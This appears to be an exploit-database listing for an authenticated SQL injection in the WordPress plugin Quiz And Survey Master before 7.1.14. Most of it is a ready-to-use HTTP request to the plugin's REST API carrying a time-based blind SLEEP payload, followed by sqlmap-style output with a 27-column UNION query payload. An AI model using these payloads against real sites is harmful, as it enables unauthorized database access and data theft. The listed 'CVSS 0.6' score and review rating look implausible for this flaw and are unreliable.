Exploit for Quiz And Survey Master < 7.1.14 - Authenticated SQL injection via Rest API

Name: Exploit for Quiz And Survey Master < 7.1.14 - Authenticated SQL injection via Rest API
Rating: 5 (58 reviews)

2021-03-26 | CVSS 0.6

## https://sploitus.com/exploit?id=WPEX-ID:EE90F784-F17B-4268-9443-8F29E58D2EE1
GET /wp-json/quiz-survey-master/v1/bank_questions/1?category=a'%20AND%20(SELECT%201950%20FROM%20(SELECT(SLEEP(5)))ckOq)--%20IYpy HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
X-WP-Nonce: 2d1236068d
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: [account with edit_post capability (author+)]


---
Parameter: category (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: category=a' AND (SELECT 1950 FROM (SELECT(SLEEP(5)))ckOq)-- IYpy

    Type: UNION query
    Title: Generic UNION query (NULL) - 27 columns
    Payload: category=a' UNION ALL SELECT NULL,NULL,CONCAT(0x71767a7871,0x4c65426b7873415142526c6e6c726a61504b4976786f5a7850744a6a78527a69667a486964675262,0x7176786271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -